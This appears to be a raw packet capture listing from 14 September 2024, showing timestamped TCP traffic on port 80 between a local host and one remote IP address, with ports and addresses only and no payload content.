Sep 14, 2024 18:31:08.381828070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381839037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381871939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381891012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381905079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381938934 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381961107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.387533903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387567043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387615919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.387708902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387742043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387772083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.387773991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387806892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387834072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.387857914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387890100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387914896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.387923002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387955904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.387975931 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388016939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388051987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388076067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388086081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388118029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388139009 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388153076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388205051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388355017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388389111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388422012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388442993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388529062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388560057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388583899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388592958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388624907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388645887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388659000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388705015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388716936 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.388739109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.388792992 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389044046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389076948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389110088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389131069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389142990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389175892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389195919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389226913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389261007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389286041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389292955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389326096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389345884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389377117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389408112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389434099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389441967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389475107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389497995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389507055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389558077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389561892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389590979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389625072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389647961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.389659882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.389719963 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.390094995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.390281916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.390352964 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.401899099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.421459913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421642065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421670914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421703100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421736956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421767950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421801090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421833992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.421933889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.421933889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.421933889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.421933889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.465989113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466023922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466059923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466093063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466130972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466162920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466197014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466228962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466300011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466329098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466361046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466384888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466384888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466384888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466396093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466427088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466464043 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466481924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466514111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466547012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466555119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466576099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466602087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466644049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466677904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466696024 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466711998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466743946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466772079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466795921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466829062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466846943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466861010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466893911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466909885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466943026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.466990948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.466995955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467032909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467065096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467082977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467106104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467209101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467211962 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467241049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467291117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467298985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467324018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467358112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467374086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467410088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467462063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467463970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467494965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467528105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467545033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467561007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467611074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467632055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467642069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467674971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467694998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467709064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467742920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467756987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467777014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467812061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467830896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467845917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.467895985 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.467988014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468019962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468055010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468074083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468086004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468117952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468137026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468169928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468203068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468219995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468234062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468266010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468285084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468316078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468348026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468362093 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468381882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468415976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468430996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468462944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468496084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468512058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468660116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468693018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468724966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468756914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468774080 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468790054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468825102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468868017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468899965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468933105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468944073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.468966007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.468981028 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469016075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469021082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469048023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469080925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469099998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469113111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469146013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469162941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469193935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469227076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469244003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469259024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469291925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469310999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469325066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469374895 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469376087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469408989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469425917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469440937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469540119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469573021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469580889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469605923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469623089 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469639063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469671965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469691038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469703913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469753027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.469907999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469939947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469973087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.469995022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470005989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470040083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470056057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470092058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470125914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470144987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470158100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470190048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470221996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470226049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470279932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470280886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470314026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470346928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470362902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470380068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470415115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470437050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.470443010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.470491886 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.509426117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509495974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509531975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509566069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509599924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509633064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509660959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.509669065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.509723902 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.509725094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.552983999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553015947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553050995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553100109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553117990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553169966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553204060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553205013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553251028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553253889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553286076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553313017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553335905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553385973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553395033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553416014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553463936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553468943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553498030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553530931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553560019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.553564072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553601027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.553621054 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554202080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554234982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554261923 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554269075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554301977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554322958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554342985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554394007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554399967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554428101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554459095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554483891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554491997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554519892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554548979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554570913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554605007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554626942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554636002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554673910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554689884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554722071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554757118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554778099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554785967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554817915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554837942 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554860115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554891109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554923058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554924011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554958105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.554986000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.554990053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555039883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555042982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555074930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555107117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555130959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555141926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555190086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555197001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555224895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555257082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555279970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555289984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555322886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555356026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555375099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555427074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.555435896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.555463076 CEST	80	49738	172.67.203.195	192.168.2.4
